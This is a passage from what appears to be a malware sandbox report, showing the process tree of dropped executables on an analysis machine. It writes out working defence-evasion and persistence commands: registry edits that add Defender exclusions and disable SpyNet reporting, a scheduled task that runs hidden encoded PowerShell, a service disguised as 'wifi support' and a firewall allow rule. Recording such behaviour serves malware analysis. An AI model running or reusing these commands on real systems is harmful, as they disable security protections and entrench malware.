                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:5064
                                                                                                                                • C:\Users\Admin\Documents\sa5DVhtEf7ep_WlbSfRYPDjG.exe
                                                                                                                                  "C:\Users\Admin\Documents\sa5DVhtEf7ep_WlbSfRYPDjG.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:448
                                                                                                                                • C:\Users\Admin\Documents\dTAdvZpo53tPSxkTfqcGxCnl.exe
                                                                                                                                  "C:\Users\Admin\Documents\dTAdvZpo53tPSxkTfqcGxCnl.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:3644
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                      7⤵
                                                                                                                                        PID:4180
                                                                                                                                    • C:\Users\Admin\Documents\3Jgpd6PwYApIOekCrEH2yzEl.exe
                                                                                                                                      "C:\Users\Admin\Documents\3Jgpd6PwYApIOekCrEH2yzEl.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:4348
                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                                                          7⤵
                                                                                                                                            PID:4200
                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4284
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1012
                                                                                                                                            7⤵
                                                                                                                                            • Program crash
                                                                                                                                            PID:2496
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1032
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Program crash
                                                                                                                                            PID:4156
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1052
                                                                                                                                            7⤵
                                                                                                                                            • Program crash
                                                                                                                                            PID:5100
                                                                                                                                        • C:\Users\Admin\Documents\0ZHOVVMtB454dk4klHzmP7GZ.exe
                                                                                                                                          "C:\Users\Admin\Documents\0ZHOVVMtB454dk4klHzmP7GZ.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:4452
                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                              7⤵
                                                                                                                                                PID:3628
                                                                                                                                            • C:\Users\Admin\Documents\tFq5XvDfanjOyNjdZoFluBOz.exe
                                                                                                                                              "C:\Users\Admin\Documents\tFq5XvDfanjOyNjdZoFluBOz.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:4544
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS242A.tmp\Install.exe
                                                                                                                                                  .\Install.exe
                                                                                                                                                  7⤵
                                                                                                                                                    PID:5012
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4212.tmp\Install.exe
                                                                                                                                                      .\Install.exe /S /site_id "525403"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:940
                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                          9⤵
                                                                                                                                                            PID:4616
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                              10⤵
                                                                                                                                                                PID:4156
                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:4716
                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:3504
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:4336
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:4056
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:3716
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /CREATE /TN "gBJTfuZtj" /SC once /ST 00:29:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                        PID:4700
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /run /I /tn "gBJTfuZtj"
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:4860
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /DELETE /F /TN "gBJTfuZtj"
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:5436
                                                                                                                                                                    • C:\Users\Admin\Documents\1F68JyXJZRcLRWap7OcIAAPw.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\1F68JyXJZRcLRWap7OcIAAPw.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:4672
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c timeout 45
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:4464
                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                              timeout 45
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                              PID:3176
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:3916
                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:4056
                                                                                                                                                                            • C:\Users\Admin\Documents\C80fWKZ1mXNO5wqKGAclGnZM.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\C80fWKZ1mXNO5wqKGAclGnZM.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:4432
                                                                                                                                                                              • C:\Users\Admin\Documents\Ezk0aAVL6N2KPgzhF0xbjEVy.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\Ezk0aAVL6N2KPgzhF0xbjEVy.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4424
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\olwgmbnc\
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:4132
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\sxsrptlk.exe" C:\Windows\SysWOW64\olwgmbnc\
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:4164
                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                        "C:\Windows\System32\sc.exe" create olwgmbnc binPath= "C:\Windows\SysWOW64\olwgmbnc\sxsrptlk.exe /d\"C:\Users\Admin\Documents\Ezk0aAVL6N2KPgzhF0xbjEVy.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:2040
                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                          "C:\Windows\System32\sc.exe" description olwgmbnc "wifi internet conection"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:2496
                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            "C:\Windows\System32\sc.exe" start olwgmbnc
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:3356
                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:804
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4424 -s 1056
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                PID:3960
                                                                                                                                                                                            • C:\Users\Admin\Documents\phYubnn6yXSB73pWGPJa01Ia.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\phYubnn6yXSB73pWGPJa01Ia.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:4416
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 900
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  PID:3228
                                                                                                                                                                                              • C:\Users\Admin\Documents\hoMOvauYq2nxj_IqnsXz3_nn.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\hoMOvauYq2nxj_IqnsXz3_nn.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:4340
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 624
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:5028
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 668
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:3144
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 644
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:3372
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 676
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:2856
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 1268
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:3328
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 1276
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:4304
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 1304
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:1636
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "hoMOvauYq2nxj_IqnsXz3_nn.exe" /f & erase "C:\Users\Admin\Documents\hoMOvauYq2nxj_IqnsXz3_nn.exe" & exit
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:972
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill /im "hoMOvauYq2nxj_IqnsXz3_nn.exe" /f
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:4500
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 1456
                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:4176
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c zaiqa_6.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:2444
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_6.exe
                                                                                                                                                                                                  zaiqa_6.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:3484
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c zaiqa_5.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:880
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c zaiqa_4.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:2516
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_4.exe
                                                                                                                                                                                                  zaiqa_4.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:3344
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_4.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_4.exe
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:3032
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c zaiqa_3.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:2032
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_3.exe
                                                                                                                                                                                                  zaiqa_3.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                  PID:2812
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c zaiqa_2.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:1992
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_2.exe
                                                                                                                                                                                                  zaiqa_2.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                  PID:1240
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c zaiqa_1.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                PID:384
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_1.exe
                                                                                                                                                                                                  zaiqa_1.exe
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:1008
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 72
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:2832
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 76
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:3472
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_5.exe
                                                                                                                                                                                            zaiqa_5.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                            PID:3864
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-FULGG.tmp\zaiqa_5.tmp
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-FULGG.tmp\zaiqa_5.tmp" /SL5="$6004C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS091BEE6D\zaiqa_5.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:2448
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1008 -ip 1008
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:1760
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1008 -ip 1008
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:3616
                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4268 -ip 4268
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4756
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4340 -ip 4340
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4960
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4268 -ip 4268
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4516
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4340 -ip 4340
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:1836
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4968 -ip 4968
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:1080
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4340 -ip 4340
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3124
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4416 -ip 4416
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3688
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4424 -ip 4424
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:3064
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4340 -ip 4340
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4848
                                                                                                                                                                                                                • C:\Windows\SysWOW64\olwgmbnc\sxsrptlk.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\olwgmbnc\sxsrptlk.exe /d"C:\Users\Admin\Documents\Ezk0aAVL6N2KPgzhF0xbjEVy.exe"
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4132
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                      svchost.exe
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4556
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 528
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5028
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4340 -ip 4340
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4204
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4132 -ip 4132
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4532
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4340 -ip 4340
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:2252
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4560 -ip 4560
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4132
                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 596 -p 3352 -ip 3352
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:996
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4348 -ip 4348
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4532
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\aiswstc
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\aiswstc
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5084
                                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:1784
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4340 -ip 4340
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:1560
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4560 -ip 4560
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:4892
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4340 -ip 4340
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1708
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4348 -ip 4348
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:3336
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3644 -ip 3644
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:4148
                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:1680
                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 680 -p 376 -ip 376
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:1600
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4560 -ip 4560
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:3532
                                                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:4268
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4348 -ip 4348
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:1848
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 3644 -ip 3644
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:1264
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4560 -ip 4560
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:4612
                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
